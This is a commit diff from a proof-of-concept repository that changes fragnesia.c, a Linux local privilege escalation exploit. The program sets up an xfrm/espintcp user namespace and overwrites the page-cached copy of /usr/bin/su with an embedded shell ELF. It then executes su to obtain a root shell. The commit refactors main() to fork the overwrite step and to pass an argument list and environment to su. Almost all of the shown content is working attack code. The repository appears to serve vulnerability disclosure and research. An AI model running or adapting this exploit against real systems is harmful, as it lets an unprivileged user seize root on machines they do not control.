milliways-infosec/fragnesia
5
0
Fork 0
mirror of https://github.com/v12-security/pocs.git synced 2026-05-16 11:07:43 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge 603b716785 into 22046fd32e

Browse source
This commit is contained in:
Grigoriy Kolbanov 2026-05-15 21:36:07 +08:00 committed by GitHub
commit 185356182c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 51 additions and 32 deletions
Download patch file Download diff file Expand all files Collapse all files

83
fragnesia/fragnesia.c
View file

@ -17,10 +17,10 @@
* to demonstrate the permission boundary.
*
* Build:
* gcc -O2 -Wall -Wextra -static xfrm_espintcp_pagecache_replace.c -o xfrm_espintcp_pagecache_replace
* gcc -O2 -Wall -Wextra -static fragnesia.c -o exp
*
* Run:
* ./xfrm_espintcp_pagecache_replace /tmp/root-owned-copy 0 42434445
* ./exp /tmp/root-owned-copy 0 42434445
*
* Exit codes:
* 1: vulnerable behavior verified
@ -1261,42 +1261,61 @@ static const uint8_t shell_elf[PAYLOAD_LEN] = {
int main(int argc, char **argv)
{
unsigned char *desired;
uint64_t file_size, byte_off;
size_t desired_len, sample_len;
int ret;
unsigned char *desired;
uint64_t file_size, byte_off;
size_t desired_len;
int ret;
pid_t pid;
char *su_argv[] = {"su", NULL};
char *su_envp[] = {"TERM=xterm", "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL};
(void)argc;
(void)argv;
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
printf(C_BCYN "[*]" C_RESET
" uid=" C_BWHT "%d" C_RESET
" euid=" C_BWHT "%d" C_RESET
" gid=" C_BWHT "%d" C_RESET
" egid=" C_BWHT "%d" C_RESET "\n",
getuid(), geteuid(), getgid(), getegid());
printf(C_BCYN "[*]" C_RESET
" mode=xfrm_espintcp_pagecache_replace collateral=after\n");
printf("\n");
printf(C_BCYN "[*]" C_RESET
" uid=" C_BWHT "%d" C_RESET
" euid=" C_BWHT "%d" C_RESET
" gid=" C_BWHT "%d" C_RESET
" egid=" C_BWHT "%d" C_RESET "\n",
getuid(), geteuid(), getgid(), getegid());
printf(C_BCYN "[*]" C_RESET
" mode=xfrm_espintcp_pagecache_replace collateral=after\n");
printf("\n");
// system("cp /bin/cat /tmp/test");
// file_size = use_existing_target("/tmp/test");
file_size = use_existing_target("/usr/bin/su");
byte_off = 0;
desired = (unsigned char *)shell_elf;
desired_len = PAYLOAD_LEN;
byte_off = 0;
desired = (unsigned char *)shell_elf;
desired_len = PAYLOAD_LEN;
printf(C_BCYN "[*]" C_RESET " target=%s size=%llu\n",
target_file, (unsigned long long)file_size);
verify_write_denied("outer");
setup_user_netns_xfrm();
verify_write_denied("userns_root_mapped_to_outer_user");
printf(C_BCYN "[*]" C_RESET " target=%s size=%llu\n",
target_file, (unsigned long long)file_size);
ret = replace_existing_bytes_after(byte_off, desired, desired_len,
file_size);
/* reset scroll region; some terminals home the cursor on \033[r so
* explicitly jump to the last row so PS1 lands below our output */
write(STDOUT_FILENO, "\033[r\033[9999;1H\033[?25h\n", 19);
execve("/usr/bin/su", NULL, NULL);
return ret;
}
pid = fork();
if (pid < 0) {
perror("fork");
return 1;
}
if (pid == 0) {
verify_write_denied("outer");
setup_user_netns_xfrm();
verify_write_denied("userns_root_mapped_to_outer_user");
ret = replace_existing_bytes_after(byte_off, desired, desired_len,
file_size);
exit(ret);
}
waitpid(pid, &ret, 0);
/* reset scroll region; some terminals home the cursor on \033[r so
* explicitly jump to the last row so PS1 lands below our output */
write(STDOUT_FILENO, "\033[r\033[9999;1H\033[?25h\n", 19);
execve("/usr/bin/su", su_argv, su_envp);
return WIFEXITED(ret) ? WEXITSTATUS(ret) : 1;
}